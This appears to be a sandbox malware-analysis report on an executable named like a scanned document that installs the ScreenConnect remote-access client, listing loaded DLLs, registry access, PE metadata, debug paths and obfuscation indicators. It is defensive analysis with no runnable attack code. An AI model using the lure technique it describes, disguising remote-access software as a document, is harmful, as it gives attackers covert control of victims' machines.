Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Section loaded: wkscli.dll

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Reads internet explorer settings

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: Scan_doc_09_16_24_1203.exe

Static PE information: certificate valid

PE file contains a mix of data directories often seen in goodware

Source: Scan_doc_09_16_24_1203.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Scan_doc_09_16_24_1203.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Scan_doc_09_16_24_1203.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Scan_doc_09_16_24_1203.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Scan_doc_09_16_24_1203.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Scan_doc_09_16_24_1203.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Scan_doc_09_16_24_1203.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: Scan_doc_09_16_24_1203.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2619140064.000002618066B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180244000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966710075.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Scan_doc_09_16_24_1203.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180667000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180240000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1963256182.0000000003322000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2960868072.0000000003321000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020769153.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020718098.0000000002DF0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1959458553.0000000000C1D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180663000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966891109.000000001B352000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180663000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966891109.000000001B352000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2619140064.000002618066B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180244000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966710075.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2619140064.0000026180234000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1963598655.00000000057A2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr

PE file contains a valid data directory to section mapping

Source: Scan_doc_09_16_24_1203.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Scan_doc_09_16_24_1203.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Scan_doc_09_16_24_1203.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Scan_doc_09_16_24_1203.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Scan_doc_09_16_24_1203.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Binary contains a suspicious time stamp

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr

Static PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

0_2_005E1000

PE file contains an invalid checksum

Source: Scan_doc_09_16_24_1203.exe

Static PE information: real checksum: 0x1bda6 should be: 0x1984e

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe	Code function: 0_2_005E1BC0 push ecx; ret	0_2_005E1BD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B78D2A5 pushad ; iretd	1_2_00007FFD9B78D2A6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8BD2B5 push ds; iretd	1_2_00007FFD9B8BD42F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A7D00 push eax; retf	1_2_00007FFD9B8A7D1D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A842E pushad ; ret	1_2_00007FFD9B8A845D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A00BD pushad ; iretd	1_2_00007FFD9B8A00C1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8AA798 push ebp; ret	1_2_00007FFD9B8D7928
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A845E push eax; ret	1_2_00007FFD9B8A846D
